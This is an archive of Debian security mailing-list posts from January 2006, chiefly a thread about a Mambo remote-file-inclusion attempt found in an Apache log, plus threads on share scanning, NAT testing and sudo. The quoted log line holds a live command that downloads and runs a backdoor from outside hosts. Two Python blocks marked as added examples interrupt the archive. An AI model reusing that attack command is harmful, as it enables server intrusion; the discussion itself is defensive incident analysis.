Re: Security scanner

2006-01-23 Thread Bernd Eckenfels
Jaroslaw Tabor <[EMAIL PROTECTED]> wrote:
> Does anyone know a network scanner I can run on Debian to search LAN for
> unprotected windows shares? Or maybe something looking for simple
> passwords? I'd like to automate discovering stupid users, leaving full
> access to their C:\.

Package: smb-nat
Priority: extra
Section: admin
Installed-Size: 192
Maintainer: Javier Fernandez-Sanguino Peña <[EMAIL PROTECTED]>
Description: Netbios Auditing Tool
 This tool can perform various security checks on remote
 servers running NetBIOS file sharing services. It
 is capable of enumerating shares and make break-in attempts
 using a (user-provided) list of users and passwords.

Greetings
Bernd


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Security scanner

2006-01-23 Thread Daniel Givens
On 1/23/06, Jaroslaw Tabor <[EMAIL PROTECTED]> wrote:
> Hi all!
>
> Does anyone know a network scanner I can run on Debian to search LAN
> for
> unprotected windows shares?

Look into Nessus. (http://www.nessus.org/)

> Or maybe something looking for simple
> passwords ?

Look into John the Ripper (http://www.openwall.com/john/)


> I'd like to automate discovering stupid users, leaving full
> access to their C:\.

...I still wouldn't let them have full access to the root drive. It
leaves too many openings for malware (ad/spyware, viruses, worms) to go
crazy on your systems. Stupid users are assumed; stupid admins are
another thing altogether.

~Daniel



Re: Security scanner

2006-01-23 Thread Danny De Cock
On Tue, 24 Jan 2006, Jaroslaw Tabor wrote:

> Hi all!
>
>   Does anyone know a network scanner I can run on Debian to search

you can use the debian package "gnomba" to easily browse through all the
windows shares that are available on your local network...  very
straightforward to use!

kind regards, danny.

> LAN for unprotected windows shares? Or maybe something looking for
> simple passwords? I'd like to automate discovering stupid users,
> leaving full access to their C:\.

-
A pessimist is a decently informed optimist.
-
mail: decockd:at:esat:dot:kuleuven:dot:be http://godot.be
  godot:at:advalvas:dot:be  http://godot.studentenweb.org
  godot:at:godot:dot:be web: http://www.esat.kuleuven.be/~decockd





Security scanner

2006-01-23 Thread Jaroslaw Tabor
Hi all!

Does anyone know a network scanner I can run on Debian to search the LAN
for unprotected Windows shares? Or maybe something looking for simple
passwords? I'd like to automate discovering stupid users leaving full
access to their C:\.

-- 
Jaroslaw Tabor <[EMAIL PROTECTED]>





Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Jose Marrero
Life is only probabilities...isn't it?

A quick link for an overview:

http://en.wikipedia.org/wiki/Referer_spam

There are blacklists elsewhere, some updated every 15 minutes.


On Mon, January 23, 2006 8:58 am, Christoph Ulrich Scholler said:
> Hi,
>
> On 23.01. 07:46, Jose Marrero wrote:
>> Apache configured with mod_rewrite to deny blank or fake referers is a
>> good idea.
>
> How can you tell that a referrer is fake?
>
> Regards,
>
> uLI
>
>
>


-- 
-JM. "These blue days and this sun of childhood" (Antonio Machado, 1939)





Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Christoph Ulrich Scholler
Hi,

On 23.01. 07:46, Jose Marrero wrote:
> Apache configured with mod_rewrite to deny blank or fake referers is a
> good idea.

How can you tell that a referrer is fake?

Regards,

uLI





Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Jose Marrero
Just a couple of things:

Apache configured with mod_rewrite to deny blank or fake referers is a
good idea.

Do you have Apache configured with mod_security?  I highly recommend the
latter, since you run a PHP-based CMS and it can protect against exploits
not yet discovered.


On Mon, January 23, 2006 2:32 am, Maik Holtkamp said:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Edward Shornock schrieb:
>> > On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote:
>> > Hi,
>> >
>> > yesterday morning I found a strange entry in my apache log files
>> (debian
>> > sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
>> > Server, just serving my Family and some good friends (normally).
>> >
>> > ---cut---
>> > 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
>> > /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20
>> > 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo|
>> >  HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
>> 5.1;)"
>> > ---cut---
>> >
>> > As I patched mambo against recent "register global" attack and my /tmp
>> > is mount noexec, the attack doesn't exploit anything.
>> >
>> > However, I curiously downloaded this sexy executable to have a closer
>> look.
>> >
>> > ---cut---
>> > backup:/home/qmb# ./sexy -h
>> > ./sexy  
>> > ---cut---
>> >
>> Never run apps like this as root.  Bad bad idea.
>
> There is an old saying in Germany:
>
> "Only damage will make you wise"

Funny, Don Quixote (when in a good mood) used to say, "Sancho, why does
experience always come when it is not needed?"*

*I am just paraphrasing...




-- 
-JM. "These blue days and this sun of childhood" (Antonio Machado, 1939)


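Whatever one decides about referers, the entry Maik posted can be caught by looking at the request itself. The following script is an added example, not code from anyone in this thread: it parses Apache combined-format log lines and flags query parameters that carry a remote URL (the mosConfig_absolute_path pattern) or a ';'-chained command; the two sample lines are constructed, mirror the shape of that entry, and use RFC 5737 documentation addresses.

```python
"""Flag remote-include and command-chain attempts in Apache access logs.

Added example, not code from the thread.  Parses Apache combined-format
lines and reports query parameters whose value is a remote URL or a
';'/'|'-chained shell command.  Sample lines below are constructed.
"""
import re
from urllib.parse import unquote

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Words that, together with a ';', '|' or '`' separator, mark a chained command.
CMD_WORDS = ("wget ", "curl ", "chmod ", "cd ", "/tmp", "sh ", "perl ")


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def query_params(target):
    """Yield percent-decoded (name, value) pairs from the request target.
    Split by hand rather than with parse_qsl so that ';' inside a value survives."""
    query = target.partition("?")[2]
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            yield unquote(name), unquote(value)


def suspicious_params(target):
    """Return (name, reason) for parameters that look like RFI or a command chain."""
    findings = []
    for name, value in query_params(target):
        if re.match(r"(?:https?|ftp)://", value, re.I):
            findings.append((name, "remote URL as parameter value"))
        if any(sep in value for sep in ";|`") and any(w in value for w in CMD_WORDS):
            findings.append((name, "chained shell command"))
    return findings


def scan_log(lines):
    """Return one alert dict per request that has suspicious parameters."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        findings = suspicious_params(rec["target"])
        if findings:
            alerts.append({"ip": rec["ip"], "ts": rec["ts"],
                           "target": rec["target"], "findings": findings})
    return alerts


# Constructed sample: the first line mirrors the shape of the thread's entry.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Jan/2006:07:08:32 +0100] "GET /cvs/index2.php?'
    '_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path='
    'http://198.51.100.9/cmd.gif?&cmd=cd%20/tmp;wget%20198.51.100.9/sexy;'
    'chmod%20744%20sexy;./sexy HTTP/1.1" 200 28 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [19/Jan/2006:07:09:01 +0100] "GET /index.php?option='
    'com_content&Itemid=1 HTTP/1.1" 200 5120 "http://example.com/" "Mozilla/5.0"',
]
```

Run scan_log() over a real access log opened in text mode; it reports only the first line of the sample.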



Simple symmetric NAT Setup using IPTABLES

2006-01-23 Thread Asif
Hello everyone. I am having a problem setting up symmetric NAT using
iptables.

Actually I am working on a SIP application. SIP has problems on NATed
networks. STUN is one of the solutions. I have embedded STUN client
functionality inside the SIP application. Now I have to test the
application. There are four scenarios of NATed network:

   The following chart shows combinations of NATs at each endpoint with
   the current NAT type definitions in STUN. The combinations are
   classified into 4 groups: Class I, II, III and IV.

  +--+-+-+-+-+-+
  |\ EP-R| | | | | |
  |  |Open |  F  |  P  | PR  | SYM |
  |EP-S \| | | | | |
  |--+-+-+-+-+-+
  | Open | | | |
  |--+ | | |
  | F| | |(III)|
  |--+( I )| ( II )  | |
  | P| | | |
  |--+ | +-+
  | PR   | | | |
  |--+ |   +-+ |
  | SYM  | |   |  (IV) |
  +--+-+---+
  Note:
   EP-S: Sending endpoint.
   EP-R: Receiving endpoint.
(In full-duplex, both EP-a and EP-b in Figure 3.1
 will have both EP-S and EP-R)
   Open: Open to public network (no NAT)
   F   : Full-cone NAT
   R   : Restricted-cone NAT
   PR  : Port restricted-cone NAT

For setting up a test environment, I decided to setup as below:



 192.168.0.2
+--+
| ClientA  |
+--+
|
|
|  eth1 eth0
| 192.168.0.1 | 172.25.25.41
+-|-+
|   NAT1|
+-|-+
|
|
|
172.25.25.42|
+---+
|Proxy\Registrar,STUN Server|
+---+
|
|
  eth1eth0  |
   10.0.0.1   |172.25.25.43 |
+-|-+
|   NAT2|
+-|-+
|
|
|
| 10.0.0.2
+--+
| ClientB  |
+--+



 172.25.25.X  LAN (External Network for client A and B)
 192.168.0.X  Private Network 1 (Internal Network for Client A)
 10.0.0.X Private Network 2 (Internal Network for Client B)

 ClientA and ClientB are sip clients with STUN functionality embedded.

 NAT1 and NAT2 are internal LAN NATs. I mean, for testing purposes, I have
used two machines with two network cards.


Below is the configuration of NAT1 using iptables. Also, I am
configuring it for the UDP protocol, as the SIP application is using UDP
for both signaling and media streaming.

> iptables -A PREROUTING -t nat -d 172.25.25.41 -i eth0 -j DNAT --to 192.168.0.2
  This tells NAT1 to change the destination of a packet received on
eth0 to ClientA's address whenever the destination is eth0 (172.25.25.41).

> iptables -A FORWARD -d 192.168.0.2 -j ACCEPT
> iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
  For forwarding the packets from eth1 and remembering their state

> iptables -A POSTROUTING -t nat -p udp -s 192.168.0.2 -o eth0 -j SNAT --to 
> 172.25.25.41:7070-7074
  To change the source address of the packet to a pool of addresses
before routing to eth0. My intention was to make it symmetric.

> echo "1" > /proc/sys/net/ipv4/ip_forward
  to set the ip_forward table ON



  I used the above commands to make NAT1 symmetric. To make it
port restricted, I change the POSTROUTING command above to
this:
> iptables -A POSTROUTING -t nat -p udp -s 192.168.0.2 -o eth0 -j SNAT --to 
> 172.25.25.41:8080
  Here NAT1 will change the source address of ClientA's packets to the
same address for routing. I am using it for testing purposes, so it will
work as long as only one client exists in Private Network 1.


  To make NAT1 restricted, I change the above POSTROUTING command
to this:
> iptables -A POSTROUTING -t nat -p udp -s 192.168.0.2 -o eth0 -j SNAT --to 
> 172.25.25.41


  To make it a full cone NAT, I have to think about it.


  So what I want is a test environment for my SIP application. I can't
use an application gateway, as only NAT will work here, because after
testing here I will try to test it in some real environment. I want
iptables commands that can do the above task. Please suggest something
if you have a better option in mind, like an application that can set
up NAT as mentioned above, or whether I can test my application on some
public STUN and proxy servers on the Internet. Also, if you think this
can be done by some utility on a different OS like Windows, please
suggest it.
  
  
  regards,
  
  Asif
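STUN classifies a NAT by how it behaves, not by how it was configured, so a simulation of the four NAT behaviours and of the RFC 3489 test sequence is a useful companion to the iptables rules above. The following is an added example, not Asif's code; the client and STUN ports and the alternate STUN server address are assumptions, the other addresses come from the post, and nothing is sent on the network.

```python
"""Simulated RFC 3489 STUN NAT-type discovery (added example, not from the post).
Models the NAT behaviours the post's test bed should produce and runs the
classic STUN test sequence against each; constructed values are marked."""
from dataclasses import dataclass, field

CLIENT = ("192.168.0.2", 5060)            # ClientA behind NAT1 (post); port constructed
NAT_PUBLIC = "172.25.25.41"               # NAT1 eth0 (post)
STUN_PRIMARY = ("172.25.25.42", 3478)     # STUN server (post); port constructed
STUN_ALTERNATE = ("172.25.25.44", 3479)   # CHANGED-ADDRESS, constructed


@dataclass
class Nat:
    """kind: 'open', 'full', 'restricted', 'port_restricted' or 'symmetric'."""
    kind: str
    next_port: int = 7070                          # first port of the post's pool
    mappings: dict = field(default_factory=dict)   # key -> external port
    permitted: set = field(default_factory=set)    # (ext_port, dst_ip, dst_port)

    def outbound(self, src, dst):
        """Translate src -> dst; return the external (ip, port) the peer sees."""
        if self.kind == "open":
            return src
        key = (src, dst) if self.kind == "symmetric" else src   # symmetric: per (src, dst)
        if key not in self.mappings:
            self.mappings[key] = self.next_port
            self.next_port += 1
        ext_port = self.mappings[key]
        self.permitted.add((ext_port, dst[0], dst[1]))
        return (NAT_PUBLIC, ext_port)

    def inbound(self, ext_port, sender):
        """Is a datagram from sender to ext_port delivered to the client?"""
        if self.kind == "open":
            return True
        for port, dst_ip, dst_port in self.permitted:
            if port != ext_port:
                continue
            if self.kind == "full":          # mapping exists: anyone may send to it
                return True
            if dst_ip == sender[0] and (self.kind == "restricted" or dst_port == sender[1]):
                return True
        return False


def stun_request(nat, server, reply_from=None):
    """Binding Request via nat; the server answers from reply_from (CHANGE-REQUEST)
    or from itself.  Returns MAPPED-ADDRESS, or None if the NAT dropped the reply."""
    ext = nat.outbound(CLIENT, server)
    return ext if nat.inbound(ext[1], reply_from or server) else None


def classify(nat):
    """RFC 3489 section 10.1 decision tree ('symmetric UDP firewall' branch omitted)."""
    mapped = stun_request(nat, STUN_PRIMARY)                                # Test I
    if mapped is None:
        return "udp blocked"
    if mapped == CLIENT:
        return "open"
    if stun_request(nat, STUN_PRIMARY, reply_from=STUN_ALTERNATE):          # Test II
        return "full"
    if stun_request(nat, STUN_ALTERNATE) != mapped:                         # Test I, alt
        return "symmetric"
    if stun_request(nat, STUN_PRIMARY, reply_from=(STUN_PRIMARY[0], STUN_ALTERNATE[1])):
        return "restricted"                                                 # Test III
    return "port_restricted"


def classify_all():
    """kind -> type detected by STUN, for every modelled NAT kind."""
    kinds = ("open", "full", "restricted", "port_restricted", "symmetric")
    return {k: classify(Nat(k)) for k in kinds}
```

Each kind is detected as itself; swapping in a different Nat model (for instance one that maps per destination but filters by address only) shows which STUN test would misclassify it.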

Re: Security implications of allowing init to re-exec from another path

2006-01-23 Thread Thomas Hood
For the record, we didn't add this feature.  The person who requested it
found that he could bind-mount a different executable over /sbin/init
instead.

-- 
Thomas Hood





Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Maik Holtkamp

Edward Shornock schrieb:
> > On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote:
> > Hi,
> > 
> > yesterday morning I found a strange entry in my apache log files (debian
> > sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
> > Server, just serving my Family and some good friends (normally).
> > 
> > ---cut---
> > 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
> > /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20
> > 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo|
> >  HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> > ---cut---
> > 
> > As I patched mambo against recent "register global" attack and my /tmp
> > is mount noexec, the attack doesn't exploit anything.
> > 
> > However, I curiously downloaded this sexy executable to have a closer look.
> > 
> > ---cut---
> > backup:/home/qmb# ./sexy -h
> > ./sexy  
> > ---cut---
> > 
> Never run apps like this as root.  Bad bad idea.

There is an old saying in Germany:

"Only damage will make you wise"

Even though the box where I tried it was on the second line and I did not
pass any arguments (IP/port) to the tool, I now see the chance that it
could have polluted the whole LAN and probably even found a way outside.

Thank god it wasn't that evil, so the Knoppix restore could fix the
situation.

> If you want more information about this tool, google for "Linux.RST.B"
> or "Unix/RST.B".

Thank you very much.

--
- maik





Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Edward Shornock
Oops...didn't trim enough of the response and curiosity made me research
this.

According to the Sophos site:

--cut--
Linux/Rst-B will attempt to infect all ELF executables in the current
working directory and the directory /bin

If Linux/Rst-B is executed by a privileged user then it may attempt to
create a backdoor on the system. This is achieved by opening a socket
and listening for a particular packet containing details about the
origin of the attacker and the command the attacker would like to
execute on the system.

--end--



I'd reinstall, since you ran this executable on your system as root.  Who
knows what the full extent of the damage caused is...




Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Edward Shornock
On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Hi,
> 
> yesterday morning I found a strange entry in my apache log files (debian
> sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
> Server, just serving my Family and some good friends (normally).
> 
> - ---cut---
> 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
> /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20
> 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo|
>  HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> - ---cut---
> 
> As I patched mambo against recent "register global" attack and my /tmp
> is mount noexec, the attack doesn't exploit anything.
> 
> However, I curiously downloaded this sexy executable to have a closer look.
> 
> - ---cut---
> backup:/home/qmb# ./sexy -h
> ./sexy  
> - ---cut---

Never run apps like this as root.  Bad bad idea.

If you want more information about this tool, google for "Linux.RST.B"
or "Unix/RST.B".

--cut--
$ f-prot sexy
Virus scanning report  -  23 January 2006 @ 4:21

F-PROT ANTIVIRUS
Program version: 4.6.5
Engine version: 3.16.13

VIRUS SIGNATURE FILES
SIGN.DEF created 13 January 2006
SIGN2.DEF created 13 January 2006
MACRO.DEF created 13 January 2006

Search: sexy
Action: Report only
Files: "Dumb" scan of all files
Switches: -ARCHIVE -PACKED -SERVER

/tmp/sexy  Infection: Unix/RST.B

Results of virus scanning:

Files: 1
MBRs: 0
Boot sectors: 0
Objects scanned: 1
Infected: 1
Suspicious: 0
Disinfected: 0
Deleted: 0
Renamed: 0

Time: 0:00
--end--


--cut--
$ clamscan sexy
sexy: Linux.RST.B FOUND

--- SCAN SUMMARY ---
Known viruses: 35671
Engine version: 0.88
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.01 MB
Time: 0.903 sec (0 m 0 s)
--end--



> 
> This host backup (sarge, 2.6.12) is in the second raw of my LAN and just
> used to make rsync backups of LAN hosts to usb hds.
> 
> Unfortunately, I was that curious, that I decided to strace it (in spite
> I hardly understand strace):
> 
> - ---cut---
> backup:/home/qmb# strace ./sexy
> execve("./sexy", ["./sexy"], [/* 20 vars */]) = 0
> uname({sys="Linux", node="backup", ...}) = 0
> brk(0)  = 0x804a000
> old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
> - -1, 0) = 0xb7f13000
> access("/etc/ld.so.nohwcap", F_OK)  = -1 ENOENT (No such file or
> directory)
> open("/etc/ld.so.preload", O_RDONLY)= -1 ENOENT (No such file or
> directory)
> open("/etc/ld.so.cache", O_RDONLY)  = 3
> fstat64(3, {st_mode=S_IFREG|0644, st_size=30780, ...}) = 0
> old_mmap(NULL, 30780, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f0b000
> close(3)= 0
> access("/etc/ld.so.nohwcap", F_OK)  = -1 ENOENT (No such file or
> directory)
> open("/lib/tls/libc.so.6", O_RDONLY)= 3
> read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`Z\1\000"...,
> 512) = 512
> fstat64(3, {st_mode=S_IFREG|0755, st_size=1254468, ...}) = 0
> old_mmap(NULL, 1264780, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xb7dd6000
> old_mmap(0xb7f0, 36864, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED,
> 3, 0x129000) = 0xb7f0
> old_mmap(0xb7f09000, 7308, PROT_READ|PROT_WRITE,
> MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f09000
> close(3)= 0
> old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
> - -1, 0) = 0xb7dd5000
> set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dd5460,
> limit:1048575, seg_32bit:1, contents:0, read_exec_only:0,
> limit_in_pages:1, seg_not_present:0, useable:1}) = 0
> munmap(0xb7f0b000, 30780)   = 0
> fork()  = 11935
> fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 0), ...}) = 0
> mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
> 0) = 0xb7f12000
> write(1, "./sexy  \n", 21./sexy  
> )  = 21
> munmap(0xb7f12000, 4096)= 0
> exit_group(2)   = ?
> - ---cut---
> 
> After this run the box was hardly damaged:
> 
> - - It insists on bringing its NIC to promiscuous mode
> - - ls, grep, gunzip (probably others, too) just give a segmentation
>   fault
> 
> I tried to investigate further:
> 
> - - tcpdump doesn't show any traffic in the net that shouldn't be there
> - - ps ax listed only known processes, all were found in /proc, too
> - - Top doesn't show anything strange
> - - netstat -tulpen doesn't list any ports listening
> 
> Trying rebooting failed totally. It tried to run a lot of grep processes
> that didn't run etc.
> 
> It took me 2 hours to return to a normal state with this box (booting
> knoppix, backup of corrupted /var, blanking the disc, restoring the
> backup of the night before).
> 
> In spite I am not that familiar with str

Re: [SECURITY] [DSA 946-1] New sudo packages fix privilege escalation

2006-01-23 Thread Josselin Mouette
On Friday 20 January 2006 at 11:24 +0100, Martin Schulze wrote:
> This update alters the former behaviour of sudo and limits the number
> of supported environment variables to LC_*, LANG, LANGUAGE and TERM.
> Additional variables are only passed through when set as env_check in
> /etc/sudoers, which might be required for some scripts to continue to
> work.

How about the XAUTHORITY environment variable? Isn't it necessary to
run X11 applications?

Regards,
-- 
 .''`.   Josselin Mouette/\./\
: :' :   [EMAIL PROTECTED]
`. `'[EMAIL PROTECTED]
   `-  Debian GNU/Linux -- The power of freedom



Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Michael Loftis



--On January 23, 2006 8:31:40 AM +0100 Maik Holtkamp 
<[EMAIL PROTECTED]> wrote:




Hi,

yesterday morning I found a strange entry in my apache log files (debian
sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
Server, just serving my Family and some good friends (normally).

- ---cut---
132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&
mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%
20212.20
3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20
YYY;echo|  HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1;)" - ---cut---

As I patched mambo against recent "register global" attack and my /tmp
is mount noexec, the attack doesn't exploit anything.

However, I curiously downloaded this sexy executable to have a closer
look.

- ---cut---
backup:/home/qmb# ./sexy -h
./sexy  
- ---cut---


Firstly, don't ever download and run untrusted code as root, especially 
when it's obviously an exploit attempt, unless you run it on an unconnected 
box you're prepared to scrap afterwards.  God knows what the code will do 
to your system.


This host backup (sarge, 2.6.12) is in the second raw of my LAN and just
used to make rsync backups of LAN hosts to usb hds.

Unfortunately, I was that curious, that I decided to strace it (in spite
I hardly understand strace):

- ---cut---
backup:/home/qmb# strace ./sexy
execve("./sexy", ["./sexy"], [/* 20 vars */]) = 0
uname({sys="Linux", node="backup", ...}) = 0
brk(0)  = 0x804a000
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
- -1, 0) = 0xb7f13000
access("/etc/ld.so.nohwcap", F_OK)  = -1 ENOENT (No such file or
directory)
open("/etc/ld.so.preload", O_RDONLY)= -1 ENOENT (No such file or
directory)
open("/etc/ld.so.cache", O_RDONLY)  = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=30780, ...}) = 0
old_mmap(NULL, 30780, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f0b000
close(3)= 0
access("/etc/ld.so.nohwcap", F_OK)  = -1 ENOENT (No such file or
directory)
open("/lib/tls/libc.so.6", O_RDONLY)= 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`Z\1\000"...,
512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1254468, ...}) = 0
old_mmap(NULL, 1264780, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) =
0xb7dd6000 old_mmap(0xb7f0, 36864, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED, 3, 0x129000) = 0xb7f0
old_mmap(0xb7f09000, 7308, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f09000
close(3)= 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
- -1, 0) = 0xb7dd5000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dd5460,
limit:1048575, seg_32bit:1, contents:0, read_exec_only:0,
limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0xb7f0b000, 30780)   = 0
fork()  = 11935
fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 0), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
0) = 0xb7f12000
write(1, "./sexy  \n", 21./sexy  
)  = 21
munmap(0xb7f12000, 4096)= 0
exit_group(2)   = ?
- ---cut---

After this run the box was hardly damaged:

- - It insists on bringing its NIC to promiscuous mode
- - ls, grep, gunzip (probably others, too) just give a segmentation
  fault

I tried to investigate further:

- - tcpdump doesn't show any traffic in the net that shouldn't be there
- - ps ax listed only known processes, all were found in /proc, too
- - Top doesn't show anything strange
- - netstat -tulpen doesn't list any ports listening

Trying rebooting failed totally. It tried to run a lot of grep processes
that didn't run etc.

It took me 2 hours to return to a normal state with this box (booting
knoppix, backup of corrupted /var, blanking the disc, restoring the
backup of the night before).

Although I am not that familiar with strace and am no coder, I suppose that
the program "sexy" damaged the linker (open ld.so.cache) and would have
tried to open a ptty on the IP/port given on the command line (As I did
not give any command line arguments, this failed). Probably the guy/bot
on the other end would have exchanged some libs in this session to
install the real rootkit on the box.

Right?


Not having the binary and not really having time to look at it, it's 
probably just straight up attempting to infect your machine, and that it 
very clearly succeeded in doing.  It didn't however succeed in hiding 
itself, as evidenced by your segfaults.  You're probably running a little 
different target OS than 'sexy' was built for.




Though I already invested some time (restoring the host backup), I would
be pleased to understand what happened more detailed so any clue is
appreciated.

If somebody